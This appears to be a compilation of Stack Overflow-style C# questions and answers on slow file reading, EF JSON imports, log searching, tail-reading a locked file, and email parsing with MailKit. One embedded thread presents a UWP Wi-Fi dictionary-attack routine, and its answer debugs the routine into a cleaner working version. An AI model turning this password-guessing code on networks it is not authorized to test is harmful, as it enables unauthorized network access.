I'm merging text files (.itf) with some logic which are located in a folder. When I compile it to 32bit (console application, .Net 4.6) everything works fine except that I get outofmemory exceptions if there are lots of data in the folders. Compiling it to 64bit would solve that problem but it is running super slow compared to the 32bit process (more than 15 times slower).
I tried it with BufferedStream and ReadAllLines, but both are performing very poorly. The profiler tells me that these methods use 99% of the time. I don't know were the problem is...
Here's the code:
private static void readData(Dictionary<string, Topic> topics)
{
foreach (string file in Directory.EnumerateFiles(Path, "*.itf"))
{
Topic currentTopic = null;
Table currentTable = null;
Object currentObject = null;
using (var fs = File.Open(file, FileMode.Open))
{
using (var bs = new BufferedStream(fs))
{
using (var sr = new StreamReader(bs, Encoding.Default))
{
string line;
while ((line = sr.ReadLine()) != null)
{
if (line.IndexOf("ETOP") > -1)
{
currentTopic = null;
}
else if (line.IndexOf("ETAB") > -1)
{
currentTable = null;
}
else if (line.IndexOf("ELIN") > -1)
{
currentObject = null;
}
else if (line.IndexOf("MTID") > -1)
{
MTID = line.Replace("MTID ", "");
}
else if (line.IndexOf("MODL") > -1)
{
MODL = line.Replace("MODL ", "");
}
else if (line.IndexOf("TOPI") > -1)
{
var name = line.Replace("TOPI ", "");
if (topics.ContainsKey(name))
{
currentTopic = topics[name];
}
else
{
var topic = new Topic(name);
currentTopic = topic;
topics.Add(name, topic);
}
}
else if (line.IndexOf("TABL") > -1)
{
var name = line.Replace("TABL ", "");
if (currentTopic.Tables.ContainsKey(name))
{
currentTable = currentTopic.Tables[name];
}
else
{
var table = new Table(name);
currentTable = table;
currentTopic.Tables.Add(name, table);
}
}
else if (line.IndexOf("OBJE") > -1)
{
if (currentTable.Name != "Metadata" || currentTable.Objects.Count == 0)
{
var shortLine = line.Replace("OBJE ", "");
var obje = new Object(shortLine.Substring(shortLine.IndexOf(" ")));
currentObject = obje;
currentTable.Objects.Add(obje);
}
}
else if (currentTopic != null && currentTable != null && currentObject != null)
{
currentObject.Data.Add(line);
}
}
}
}
}
}
}
The biggest problem with your program is that, when you let it run in 64-bit mode, then it can read a lot more files. Which is nice, a 64-bit process has a thousand times more address space than a 32-bit process, running out of it is excessively unlikely.
But you do not get a thousand times more RAM.
The universal principle of "there is no free lunch" at work. Having enough RAM matters a great deal in a program like this. First and foremost, it is used by the file system cache. That magical operating system feature that makes it look like reading files from a disk is very cheap. It is not at all, one of the slowest things you can do in a program, but it is very good at hiding it. You'll invoke it when you run your program more than once. The second, and subsequent, times you won't read from the disk at all. That's a pretty dangerous feature and very hard to avoid when you test your program, you get very unrealistic assumptions about how efficient it is.
The problem with a 64-bit process is that it easily makes the file system cache ineffective. Since you can read a lot more files, thus overwhelming the cache. And getting old file data removed. Now the second time you run your program it will not be fast anymore. The files you read will not be in the cache anymore but must be read from the disk. You'll now see the real perf of your program, the way it will behave in production. That's a good thing, even though you don't like it very much :)
Secondary problem with RAM is the lesser one, if you allocate a lot of memory to store the file data then you'll force the operating system to find the RAM to store it. That can cause a lot of hard page faults, incurred when it must unmap memory used by another process, or yours, to free up the RAM that you need. A generic problem called "thrashing". Page faults is something you can see in Task Manager, use View > Select Columns to add it.
Given that the file system cache is the most likely source of the slow-down, a simple test you can do is rebooting your machine, which ensures that the cache cannot have any of the file data, then run the 32-bit version. With the prediction that it will also be slow and that BufferedStream and ReadAllLines are the bottlenecks. Like they should be.
One final note, even though your program doesn't match the pattern, you cannot make strong assumptions about .NET 4.6 perf problems yet. Not until this very nasty bug gets fixed.
A few tips:
Why do you use File.Open, then BufferedStream then StreamReader when
you can do the job with just a StreamReader, which is buffered?
You should reorder your conditions with the one that happen the more often in first.
Consider read all lines then use Parallel.ForEach
I could solve it. Seems that there is a bug in .Net compiler. Removing the code optimization checkbox in VS2015 lead to a huge performance increase. Now, it is running with a similar performance as the 32 bit version. My final version with some optimizations:
private static void readData(ref Dictionary<string, Topic> topics)
{
Regex rgxOBJE = new Regex("OBJE [0-9]+ ", RegexOptions.IgnoreCase | RegexOptions.Compiled);
Regex rgxTABL = new Regex("TABL ", RegexOptions.IgnoreCase | RegexOptions.Compiled);
Regex rgxTOPI = new Regex("TOPI ", RegexOptions.IgnoreCase | RegexOptions.Compiled);
Regex rgxMTID = new Regex("MTID ", RegexOptions.IgnoreCase | RegexOptions.Compiled);
Regex rgxMODL = new Regex("MODL ", RegexOptions.IgnoreCase | RegexOptions.Compiled);
foreach (string file in Directory.EnumerateFiles(Path, "*.itf"))
{
if (file.IndexOf("itf_merger_result") == -1)
{
Topic currentTopic = null;
Table currentTable = null;
Object currentObject = null;
using (var sr = new StreamReader(file, Encoding.Default))
{
Stopwatch sw = new Stopwatch();
sw.Start();
Console.WriteLine(file + " read, parsing ...");
string line;
while ((line = sr.ReadLine()) != null)
{
if (line.IndexOf("OBJE") > -1)
{
if (currentTable.Name != "Metadata" || currentTable.Objects.Count == 0)
{
var obje = new Object(rgxOBJE.Replace(line, ""));
currentObject = obje;
currentTable.Objects.Add(obje);
}
}
else if (line.IndexOf("TABL") > -1)
{
var name = rgxTABL.Replace(line, "");
if (currentTopic.Tables.ContainsKey(name))
{
currentTable = currentTopic.Tables[name];
}
else
{
var table = new Table(name);
currentTable = table;
currentTopic.Tables.Add(name, table);
}
}
else if (line.IndexOf("TOPI") > -1)
{
var name = rgxTOPI.Replace(line, "");
if (topics.ContainsKey(name))
{
currentTopic = topics[name];
}
else
{
var topic = new Topic(name);
currentTopic = topic;
topics.Add(name, topic);
}
}
else if (line.IndexOf("ETOP") > -1)
{
currentTopic = null;
}
else if (line.IndexOf("ETAB") > -1)
{
currentTable = null;
}
else if (line.IndexOf("ELIN") > -1)
{
currentObject = null;
}
else if (currentTopic != null && currentTable != null && currentObject != null)
{
currentObject.Data.Add(line);
}
else if (line.IndexOf("MTID") > -1)
{
MTID = rgxMTID.Replace(line, "");
}
else if (line.IndexOf("MODL") > -1)
{
MODL = rgxMODL.Replace(line, "");
}
}
sw.Stop();
Console.WriteLine(file + " parsed in {0}s", sw.ElapsedMilliseconds / 1000.0);
}
}
}
}
Removing the code optimization checkbox should typically result in performance slowdowns, not speedups. There may be an issue in the VS 2015 product. Please provide a stand-alone repro case with an input set to your program that demonstrate the performance problem and report at: http://connect.microsoft.com/
Related
I'm working on a utility to read through a JSON file I've been given and to transform it into SQL Server. My weapon of choice is a .NET Core Console App (I'm trying to do all of my new work with .NET Core unless there is a compelling reason not to). I have the whole thing "working" but there is clearly a problem somewhere because the performance is truly horrifying almost to the point of being unusable.
The JSON file is approximately 27MB and contains a main array of 214 elements and each of those contains a couple of fields along with an array of from 150-350 records (that array has several fields and potentially a small <5 record array or two). Total records are approximately 35,000.
In the code below I've changed some names and stripped out a few of the fields to keep it more readable but all of the logic and code that does actual work is unchanged.
Keep in mind, I've done a lot of testing with the placement and number of calls to SaveChanges() think initially that number of trips to the Db was the problem. Although the version below is calling SaveChanges() once for each iteration of the 214-record loop, I've tried moving it outside of the entire looping structure and there is no discernible change in performance. In other words, with zero trips to the Db, this is still SLOW. How slow you ask, how does > 24 hours to run hit you? I'm willing to try anything at this point and am even considering moving the whole process into SQL Server but would much reather work in C# than TSQL.
static void Main(string[] args)
{
string statusMsg = String.Empty;
JArray sets = JArray.Parse(File.ReadAllText(#"C:\Users\Public\Downloads\ImportFile.json"));
try
{
using (var _db = new WidgetDb())
{
for (int s = 0; s < sets.Count; s++)
{
Console.WriteLine($"{s.ToString()}: {sets[s]["name"]}");
// First we create the Set
Set eSet = new Set()
{
SetCode = (string)sets[s]["code"],
SetName = (string)sets[s]["name"],
Type = (string)sets[s]["type"],
Block = (string)sets[s]["block"] ?? ""
};
_db.Entry(eSet).State = Microsoft.EntityFrameworkCore.EntityState.Added;
JArray widgets = sets[s]["widgets"].ToObject<JArray>();
for (int c = 0; c < widgets.Count; c++)
{
Widget eWidget = new Widget()
{
WidgetId = (string)widgets[c]["id"],
Layout = (string)widgets[c]["layout"] ?? "",
WidgetName = (string)widgets[c]["name"],
WidgetNames = "",
ReleaseDate = releaseDate,
SetCode = (string)sets[s]["code"]
};
// WidgetColors
if (widgets[c]["colors"] != null)
{
JArray widgetColors = widgets[c]["colors"].ToObject<JArray>();
for (int cc = 0; cc < widgetColors.Count; cc++)
{
WidgetColor eWidgetColor = new WidgetColor()
{
WidgetId = eWidget.WidgetId,
Color = (string)widgets[c]["colors"][cc]
};
_db.Entry(eWidgetColor).State = Microsoft.EntityFrameworkCore.EntityState.Added;
}
}
// WidgetTypes
if (widgets[c]["types"] != null)
{
JArray widgetTypes = widgets[c]["types"].ToObject<JArray>();
for (int ct = 0; ct < widgetTypes.Count; ct++)
{
WidgetType eWidgetType = new WidgetType()
{
WidgetId = eWidget.WidgetId,
Type = (string)widgets[c]["types"][ct]
};
_db.Entry(eWidgetType).State = Microsoft.EntityFrameworkCore.EntityState.Added;
}
}
// WidgetVariations
if (widgets[c]["variations"] != null)
{
JArray widgetVariations = widgets[c]["variations"].ToObject<JArray>();
for (int cv = 0; cv < widgetVariations.Count; cv++)
{
WidgetVariation eWidgetVariation = new WidgetVariation()
{
WidgetId = eWidget.WidgetId,
Variation = (string)widgets[c]["variations"][cv]
};
_db.Entry(eWidgetVariation).State = Microsoft.EntityFrameworkCore.EntityState.Added;
}
}
}
_db.SaveChanges();
}
}
statusMsg = "Import Complete";
}
catch (Exception ex)
{
statusMsg = ex.Message + " (" + ex.InnerException + ")";
}
Console.WriteLine(statusMsg);
Console.ReadKey();
}
I had an issue with that kind of code, lots of loops and tons of changing state.
Any change / manipulation you make in _db context, will generate a "trace" of it. And it making your context slower each time. Read more here.
The fix for me was to create new EF context(_db) at some key points. It saved me a few hours per run!
You could try to create a new instance of _db each iteration in this loop
contains a main array of 214 elements
If it make no change, try to add some stopwatch to get a best idea of what/where is taking so long.
If you're making thousands of updates then EF is not really the way to go. Something like SQLBulkCopy will do the trick.
You could try the bulkwriter library.
IEnumerable<string> ReadFile(string path)
{
using (var stream = File.OpenRead(path))
using (var reader = new StreamReader(stream))
{
while (reader.Peek() >= 0)
{
yield return reader.ReadLine();
}
}
}
var items =
from line in ReadFile(#"C:\products.csv")
let values = line.Split(',')
select new Product {Sku = values[0], Name = values[1]};
then
using (var bulkWriter = new BulkWriter<Product>(connectionString)) {
bulkWriter.WriteToDatabase(items);
}
I'm working on a proof of concept at the moment, just for fun (and for YouTube). The thing I am trying to prove is that I can efficiently "hack" WiFi passwords using UWP and C# for Windows. I don't know of any Wi-Fi cracking tools that are designed specifically for Windows 10 devices (PC, Tablet, XboxOne, Mobile etc)...
So I have actually managed to perform a dictionary style attack (on my own WiFi network of course). However my function seems to completely crash occasionally when running the "hack".
Please consider the fact that this is completely white hat hacking I am talking about here, nothing illegal is intended.
Any help with a reason why this crashes is appreciated...
private async void connectWiFi_Tapped(object sender, TappedRoutedEventArgs e)
{
int success = 0;
var picker = new FileOpenPicker();
picker.ViewMode = PickerViewMode.Thumbnail;
picker.SuggestedStartLocation = PickerLocationId.DocumentsLibrary;
picker.FileTypeFilter.Add(".txt");
StorageFile file = await picker.PickSingleFileAsync();
if (file != null)
{
do
{
string _line;
using (var inputStream = await file.OpenReadAsync())
using (var classicStream = inputStream.AsStreamForRead())
using (var streamReader = new StreamReader(classicStream))
{
while (streamReader.Peek() >= 0)
{
if (success == 0)
{
_line = streamReader.ReadLine();
setConnectionStatus("Status: Checking WiFi network using passphrase " + _line);
if (await checkWifiPassword(_line) == true)
{
success = 1;
setConnectionStatus("SUCCESS: Password successfully identified as " + _line);
firstAdapter.Disconnect();
var msg = new MessageDialog(connectionStatus.Text);
await msg.ShowAsync();
}
else
{
success = 0;
setConnectionStatus("FAIL: Password " + _line + "is incorrect. Checking next password...");
}
}
}
}
} while (success == 0);
}
}
This is the code that actually runs a dictionary-style "hack" on a selected network. The code to actually connect to the network is as follows:
private async Task<bool> checkWifiPassword(string passPhrase)
{
var credential = new PasswordCredential();
WiFiReconnectionKind reconnectionKind = WiFiReconnectionKind.Manual;
credential.Password = passPhrase;
var selectedNetwork = null as WiFiNetworkDisplay;
foreach (var network in ResultCollection)
{
if (WifiNetworks.SelectedItem.ToString() == network.Ssid)
{
selectedNetwork = network as WiFiNetworkDisplay;
}
}
if (selectedNetwork != null)
{
var result = await firstAdapter.ConnectAsync(selectedNetwork.AvailableNetwork, reconnectionKind, credential);
if (result.ConnectionStatus == WiFiConnectionStatus.Success)
{
return true;
}
else
{
return false;
}
}
else
{
return false;
}
}
Does anyone have any idea what I am missing here?
Any help appreciated.
Thanks
Consider this loop
while (streamReader.Peek() >= 0)
{
if (success == 0)
{
_line = streamReader.ReadLine();
setConnectionStatus("Status: Checking WiFi network using passphrase " + _line);
if (await checkWifiPassword(_line) == true)
{
success = 1;
setConnectionStatus("SUCCESS: Password successfully identified as " + _line);
firstAdapter.Disconnect();
var msg = new MessageDialog(connectionStatus.Text);
await msg.ShowAsync();
}
else
{
success = 0;
setConnectionStatus("FAIL: Password " + _line + "is incorrect. Checking next password...");
}
}
}
This can lead to and infinite loop:
Imagine the following dictionary file:
abc
bcd
cde
where abc is the correct password.
You peek the stream, you get 97 (decimal ASCII for letter a), fine.
Success is 0, as we just started.
You read the next line.
You check the password, it works, cool.
You set success to 1, show the message, etc.
User closes the message dialog, ShowAsync() returns.
End of first loop iteration, let's start another one.
You peek the stream, you get 98 (ASCII for letter b), non 0, fine.
Success is not zero, so we skip the entire body of that while, end of second loop iteration.
You peek the stream again, the pointer did not move since the last peek, so you're going to get that same 98 again.
And you skip again, infinite loop.
EDIT - there is actually another infinite loop there
I will not detail this that much, but take a look at the outer do-while loop. That loop runs until success. But if the inner loop exhausts all possibilities and does not find a correct password, success will remain 0. That means the do while will run once again, the inner loop will go through the file again, which obviously will not find a solution again, and so on.
Solution
There are many ways that code could be cleaned up, but the quick fix is to break after msg.ShowAsync();.
More details (that would belong to codereview.stackexchange.com):
Also I would not Peek the StreamReader. Use EndOfStream for that job. And you can skip the inner if, you simply break if you found a correct password. You can drop the outer loop as well. If you completed the inner loop without setting the success flag (which in turn should be a boolean) you can report to the user that no password worked.
I would do something along the lines of: (take it as a pseudo code, might not compile as it is)
private async void connectWiFi_Tapped(object sender, TappedRoutedEventArgs e)
{
var picker = new FileOpenPicker();
picker.ViewMode = PickerViewMode.Thumbnail;
picker.SuggestedStartLocation = PickerLocationId.DocumentsLibrary;
picker.FileTypeFilter.Add(".txt");
StorageFile file = await picker.PickSingleFileAsync();
if (file != null)
{
bool success = false;
string _line;
using (var inputStream = await file.OpenReadAsync())
using (var classicStream = inputStream.AsStreamForRead())
using (var streamReader = new StreamReader(classicStream))
{
while (!streamReader.EndOfStream)
{
_line = streamReader.ReadLine();
setConnectionStatus("Status: Checking WiFi network using passphrase " + _line);
if (await checkWifiPassword(_line) == true)
{
success = true;
setConnectionStatus("SUCCESS: Password successfully identified as " + _line);
firstAdapter.Disconnect();
var msg = new MessageDialog(connectionStatus.Text);
await msg.ShowAsync();
break;
}
else
{
setConnectionStatus("FAIL: Password " + _line + "is incorrect. Checking next password...");
}
}
}
if(!success){ /* report to the user*/ }
}
I am facing a performance issue while searching the content of a file. I am using the FileStream class to read files (~10 files will be involved for each search with each being ~70 MB in size). However, all of these files are simultaneously being accessed and updated by an another process during my search. As such, I cannot use Buffersize for reading files. Using buffer size in StreamReader takes 3 minutes even though I am using regex.
Has anyone come across a similar situation and could offer any pointers on improving the performance of file search?
Code Snippet
private static int BufferSize = 32768;
using (FileStream fs = File.Open(filePath, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))
{
using (TextReader txtReader = new StreamReader(fs, Encoding.UTF8, true, BufferSize))
{
System.Text.RegularExpressions.Regex patternMatching = new System.Text.RegularExpressions.Regex(#"(?=\d{4}-\d{2}-\d{2}\s\d{2}:\d{2}:\d{2})(.*?)(?=\n\d{4}-\d{2}-\d{2}\s\d{2}:\d{2}:\d{2})", System.Text.RegularExpressions.RegexOptions.IgnoreCase);
System.Text.RegularExpressions.Regex dateStringMatch = new Regex(#"^\d{4}-\d{2}-\d{2}\s\d{2}:\d{2}:\d{2}");
char[] temp = new char[1048576];
while (txtReader.ReadBlock(temp, 0, 1048576) > 0)
{
StringBuilder parseString = new StringBuilder();
parseString.Append(temp);
if (temp[1023].ToString() != Environment.NewLine)
{
parseString.Append(txtReader.ReadLine());
while (txtReader.Peek() > 0 && !(txtReader.Peek() >= 48 && txtReader.Peek() <= 57))
{
parseString.Append(txtReader.ReadLine());
}
}
if (parseString.Length > 0)
{
string[] allRecords = patternMatching.Split(parseString.ToString());
foreach (var item in allRecords)
{
var contentString = item.Trim();
if (!string.IsNullOrWhiteSpace(contentString))
{
var matches = dateStringMatch.Matches(contentString);
if (matches.Count > 0)
{
var rowDatetime = DateTime.MinValue;
if (DateTime.TryParse(matches[0].Value, out rowDatetime))
{
if (rowDatetime >= startDate && rowDatetime < endDate)
{
if (contentString.ToLowerInvariant().Contains(searchText))
{
var result = new SearchResult
{
LogFileType = logFileType,
Message = string.Format(messageTemplateNew, item),
Timestamp = rowDatetime,
ComponentName = componentName,
FileName = filePath,
ServerName = serverName
};
searchResults.Add(result);
}
}
}
}
}
}
}
}
}
}
return searchResults;
Some time ago I had to analyse many FileZilla Server Logfiles with each >120MB.
I used a simple List to get all lines of each logfile and then had a great performance searching for specific lines.
List<string> fileContent = File.ReadAllLines(pathToFile).ToList()
But in your case I think the main reason for the bad performance isn't reading the file. Try to StopWatch some parts of your loop to check where the most time is spent. Regex and TryParse can be very time consuming if used many times in a loop like yours.
I do not want to read the whole file at any point, I know there are answers on that question, I want t
o read the First or Last line.
I know that my code locks the file that it's reading for two reasons 1) The application that writes to the file crashes intermittently when I run my little app with this code but it never crashes when I am not running this code! 2) There are a few articles that will tell you that File.ReadLines locks the file.
There are some similar questions but that answer seems to involve reading the whole file which is slow for large files and therefore not what I want to do. My requirement to only read the last line most of the time is also unique from what I have read about.
I nead to know how to read the first line (Header row) and the last line (latest row). I do not want to read all lines at any point in my code because this file can become huge and reading the entire file will become slow.
I know that
line = File.ReadLines(fullFilename).First().Replace("\"", "");
... is the same as ...
FileStream fs = new FileStream(#fullFilename, FileMode.Open, FileAccess.Read, FileShare.Read);
My question is, how can I repeatedly read the first and last lines of a file which may be being written to by another application without locking it in any way. I have no control over the application that is writting to the file. It is a data log which can be appended to at any time. The reason I am listening in this way is that this log can be appended to for days on end. I want to see the latest data in this log in my own c# programme without waiting for the log to finish being written to.
My code to call the reading / listening function ...
//Start Listening to the "data log"
private void btnDeconstructCSVFile_Click(object sender, EventArgs e)
{
MySandbox.CopyCSVDataFromLogFile copyCSVDataFromLogFile = new MySandbox.CopyCSVDataFromLogFile();
copyCSVDataFromLogFile.checkForLogData();
}
My class which does the listening. For now it simply adds the data to 2 generics lists ...
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using MySandbox.Classes;
using System.IO;
namespace MySandbox
{
public class CopyCSVDataFromLogFile
{
static private List<LogRowData> listMSDataRows = new List<LogRowData>();
static String fullFilename = string.Empty;
static LogRowData previousLineLogRowList = new LogRowData();
static LogRowData logRowList = new LogRowData();
static LogRowData logHeaderRowList = new LogRowData();
static Boolean checking = false;
public void checkForLogData()
{
//Initialise
string[] logHeaderArray = new string[] { };
string[] badDataRowsArray = new string[] { };
//Get the latest full filename (file with new data)
//Assumption: only 1 file is written to at a time in this directory.
String directory = "C:\\TestDir\\";
string pattern = "*.csv";
var dirInfo = new DirectoryInfo(directory);
var file = (from f in dirInfo.GetFiles(pattern) orderby f.LastWriteTime descending select f).First();
fullFilename = directory + file.ToString(); //This is the full filepath and name of the latest file in the directory!
if (logHeaderArray.Length == 0)
{
//Populate the Header Row
logHeaderRowList = getRow(fullFilename, true);
}
LogRowData tempLogRowList = new LogRowData();
if (!checking)
{
//Read the latest data in an asynchronous loop
callDataProcess();
}
}
private async void callDataProcess()
{
checking = true; //Begin checking
await checkForNewDataAndSaveIfFound();
}
private static Task checkForNewDataAndSaveIfFound()
{
return Task.Run(() => //Call the async "Task"
{
while (checking) //Loop (asynchronously)
{
LogRowData tempLogRowList = new LogRowData();
if (logHeaderRowList.ValueList.Count == 0)
{
//Populate the Header row
logHeaderRowList = getRow(fullFilename, true);
}
else
{
//Populate Data row
tempLogRowList = getRow(fullFilename, false);
if ((!Enumerable.SequenceEqual(tempLogRowList.ValueList, previousLineLogRowList.ValueList)) &&
(!Enumerable.SequenceEqual(tempLogRowList.ValueList, logHeaderRowList.ValueList)))
{
logRowList = getRow(fullFilename, false);
listMSDataRows.Add(logRowList);
previousLineLogRowList = logRowList;
}
}
//System.Threading.Thread.Sleep(10); //Wait for next row.
}
});
}
private static LogRowData getRow(string fullFilename, bool isHeader)
{
string line;
string[] logDataArray = new string[] { };
LogRowData logRowListResult = new LogRowData();
try
{
if (isHeader)
{
//Asign first (header) row data.
//Works but seems to block writting to the file!!!!!!!!!!!!!!!!!!!!!!!!!!!
line = File.ReadLines(fullFilename).First().Replace("\"", "");
}
else
{
//Assign data as last row (default behaviour).
line = File.ReadLines(fullFilename).Last().Replace("\"", "");
}
logDataArray = line.Split(',');
//Copy Array to Generics List and remove last value if it's empty.
for (int i = 0; i < logDataArray.Length; i++)
{
if (i < logDataArray.Length)
{
if (i < logDataArray.Length - 1)
{
//Value is not at the end, from observation, these always have a value (even if it's zero) and so we'll store the value.
logRowListResult.ValueList.Add(logDataArray[i]);
}
else
{
//This is the last value
if (logDataArray[i].Replace("\"", "").Trim().Length > 0)
{
//In this case, the last value is not empty, store it as normal.
logRowListResult.ValueList.Add(logDataArray[i]);
}
else { /*The last value is empty, e.g. "123,456,"; the final comma denotes another field but this field is empty so we will ignore it now. */ }
}
}
}
}
catch (Exception ex)
{
if (ex.Message == "Sequence contains no elements")
{ /*Empty file, no problem. The code will safely loop and then will pick up the header when it appears.*/ }
else
{
//TODO: catch this error properly
Int32 problemID = 10; //Unknown ERROR.
}
}
return logRowListResult;
}
}
}
I found the answer in a combination of other questions. One answer explaining how to read from the end of a file, which I adapted so that it would read only 1 line from the end of the file. And another explaining how to read the entire file without locking it (I did not want to read the entire file but the not locking part was useful). So now you can read the last line of the file (if it contains end of line characters) without locking it. For other end of line delimeters, just replace my 10 and 13 with your end of line character bytes...
Add the method below to public class CopyCSVDataFromLogFile
private static string Reverse(string str)
{
char[] arr = new char[str.Length];
for (int i = 0; i < str.Length; i++)
arr[i] = str[str.Length - 1 - i];
return new string(arr);
}
and replace this line ...
line = File.ReadLines(fullFilename).Last().Replace("\"", "");
with this code block ...
Int32 endOfLineCharacterCount = 0;
Int32 previousCharByte = 0;
Int32 currentCharByte = 0;
//Read the file, from the end, for 1 line, allowing other programmes to access it for read and write!
using (FileStream reader = new FileStream(fullFilename, FileMode.Open, FileAccess.Read, FileShare.ReadWrite, 0x1000, FileOptions.SequentialScan))
{
int i = 0;
StringBuilder lineBuffer = new StringBuilder();
int byteRead;
while ((-i < reader.Length) /*Belt and braces: if there were no end of line characters, reading beyond the file would give a catastrophic error here (to be avoided thus).*/
&& (endOfLineCharacterCount < 2)/*Exit Condition*/)
{
reader.Seek(--i, SeekOrigin.End);
byteRead = reader.ReadByte();
currentCharByte = byteRead;
//Exit condition: the first 2 characters we read (reading backwards remember) were end of line ().
//So when we read the second end of line, we have read 1 whole line (the last line in the file)
//and we must exit now.
if (currentCharByte == 13 && previousCharByte == 10)
{
endOfLineCharacterCount++;
}
if (byteRead == 10 && lineBuffer.Length > 0)
{
line += Reverse(lineBuffer.ToString());
lineBuffer.Remove(0, lineBuffer.Length);
}
lineBuffer.Append((char)byteRead);
previousCharByte = byteRead;
}
reader.Close();
}
it is possible using OpenPop.dll.
Pop3Client objPOP3Client = new Pop3Client();
int intTotalEmail = 0;
DataTable dtEmail = new DataTable();
object[] objMessageParts;
try
{
dtEmail = GetAllEmailStructure();
if (objPOP3Client.Connected)
objPOP3Client.Disconnect();
objPOP3Client.Connect(strHostName, intPort, bulUseSSL);
try
{
objPOP3Client.Authenticate(strUserName, new Common()._Decode(strPassword));
intTotalEmail = objPOP3Client.GetMessageCount();
AddMapping();
for (int i = 1; i <= intTotalEmail; i++)
{
objMessageParts = GetMessageContent(i, ref objPOP3Client, dtExistMailList);
if (objMessageParts != null && objMessageParts[0].ToString() == "0")
{
AddToDtEmail(objMessageParts, i, dtEmail, dtUserList, dtTicketIDList, dtBlacklistEmails, dtBlacklistSubject, dtBlacklistDomains);
}
}
}
catch (Exception ex)
{
}
}
catch (Exception ex)
{
ParserLogError(ex, "GetAllEmail()");
}
finally
{
if (objPOP3Client.Connected)
objPOP3Client.Disconnect();
}
// function
public object[] GetMessageContent(int intMessageNumber, ref Pop3Client objPOP3Client, DataTable dtExistingMails)
{
object[] strArrMessage = new object[10];
Message objMessage;
MessagePart plainTextPart = null, HTMLTextPart = null;
string strMessageId = "";
try
{
strArrMessage[0] = "";
strArrMessage[1] = "";
strArrMessage[2] = "";
strArrMessage[3] = "";
strArrMessage[4] = "";
strArrMessage[5] = "";
strArrMessage[6] = "";
strArrMessage[7] = null;
strArrMessage[8] = null;
strArrMessage[7] = "";
strArrMessage[8] = "";
objMessage = objPOP3Client.GetMessage(intMessageNumber);
strMessageId = (objMessage.Headers.MessageId == null ? "" : objMessage.Headers.MessageId.Trim());
if (!IsExistMessageID(dtExistingMails, strMessageId)) //check in data base message id is exists or not
{
strArrMessage[0] = "0";
strArrMessage[1] = objMessage.Headers.From.Address.Trim(); // From EMail Address
strArrMessage[2] = objMessage.Headers.From.DisplayName.Trim(); // From EMail Name
strArrMessage[3] = objMessage.Headers.Subject.Trim();// Mail Subject
plainTextPart = objMessage.FindFirstPlainTextVersion();
strArrMessage[4] = (plainTextPart == null ? "" : plainTextPart.GetBodyAsText().Trim());
HTMLTextPart = objMessage.FindFirstHtmlVersion();
strArrMessage[5] = (HTMLTextPart == null ? "" : HTMLTextPart.GetBodyAsText().Trim());
strArrMessage[6] = strMessageId;
List<MessagePart> attachment = objMessage.FindAllAttachments();
strArrMessage[7] = null;
strArrMessage[8] = null;
if (attachment.Count > 0)
{
if (attachment[0] != null && attachment[0].IsAttachment)
{
strArrMessage[7] = attachment[0].FileName.Trim();
strArrMessage[8] = attachment[0];
}
}
}
else
{
strArrMessage[0] = "1";
}
}
catch (Exception ex)
{
ParserLogError(ex, "GetMessageContent()");
}
return strArrMessage;
}
but, i want to make it faster than above OpenPop.dll. so please let me know if any other technique are there for parsing mails.
please check code and then tell me.
Thanks in advance
but, i want to make it faster than above OpenPop.dll. so please let me
know if any other technique are there for parsing mails.
In your GetMessageContent() method, the 1 place that consumes the vast amount of time is:
objMessage = objPOP3Client.GetMessage(intMessageNumber);
The network I/O part of downloading a message cannot really be optimized, but OpenPop.NET's parser is slow (based on my own performance tests).
MimeKit is 25x faster than OpenPop.NET at parsing email messages.
One of the main performance problems in OpenPop.NET's MIME parser is the fact that it uses a StreamReader for parsing (which is slow due to unnecessary charset conversion, reading 1 line at a time, etc - I have an analysis of another email library that uses StreamReader for parsing here: https://stackoverflow.com/a/18787176/87117).
Then there's the problem that OpenPop.NET's parser also uses Regex to remove CFWS (Comments and Folding White Space) from a header string before parsing/decoding it. This is expensive. It's far better to write a good tokenizer that can deal with CFWS.
If you are interested in some of the other techniques I used to optimize MimeKit to be so fast (as fast or faster than highly optimized C implementations), I wrote some blog posts about this:
Optimization Tricks used by MimeKit: Part 1
The summary of the optimization I talk about in part 1 is replacing loops like this that scan for the end of a line:
while (*inptr != (byte) '\n')
inptr++;
with a faster loop, like this:
int* dword = (int*) inptr;
do {
mask = *dword++ ^ 0x0A0A0A0A;
mask = ((mask - 0x01010101) & (~mask & 0x80808080));
} while (mask == 0);
inptr = (byte*) (dword - 1);
while (*inptr != (byte) '\n')
inptr++;
which improved performance by 20% (although on non-x86 architectures, it requires 'dword' to be 4-byte aligned).
Optimization Tricks used by MimeKit: Part 2
In part 2, I talk about writing a more optimized version of System.IO.MemoryStream. The problem with MemoryStream is that it has to keep 1 contiguous block of memory with the content, which means that as you write more data to it and it has to resize its internal byte array, it has to copy the content to the new array (which is expensive, especially once the amount of data in the stream is large).
To work around this performance bottleneck, I wrote a MemoryBlockStream which does not need to use a contiguous block of memory - it uses a linked list of byte arrays. Instead of having to resize the byte array when you overflow the current buffer, it simply allocates another 2048-byte array that the data will overflow into and appends it to the linked list.
Note: MimeKit itself only does email parsing, it doesn't do POP3 or SMTP or IMAP. If you want that kind of functionality, I've also written a library built on MimeKit that does that as well: MailKit
Update:
Sample code using MailKit (as requested) to download/parse all messages:
using System;
using System.Net;
using MailKit.Net.Pop3;
using MailKit;
using MimeKit;
namespace TestClient {
class Program
{
public static void Main (string[] args)
{
using (var client = new Pop3Client ()) {
client.Connect ("pop.gmail.com", 995, true);
// Note: since we don't have an OAuth2 token, disable
// the XOAUTH2 authentication mechanism.
client.AuthenticationMechanisms.Remove ("XOAUTH2");
client.Authenticate ("joey#gmail.com", "password");
int count = client.GetMessageCount ();
for (int i = 0; i < count; i++) {
var message = client.GetMessage (i);
Console.WriteLine ("Subject: {0}", message.Subject);
}
client.Disconnect (true);
}
}
}
}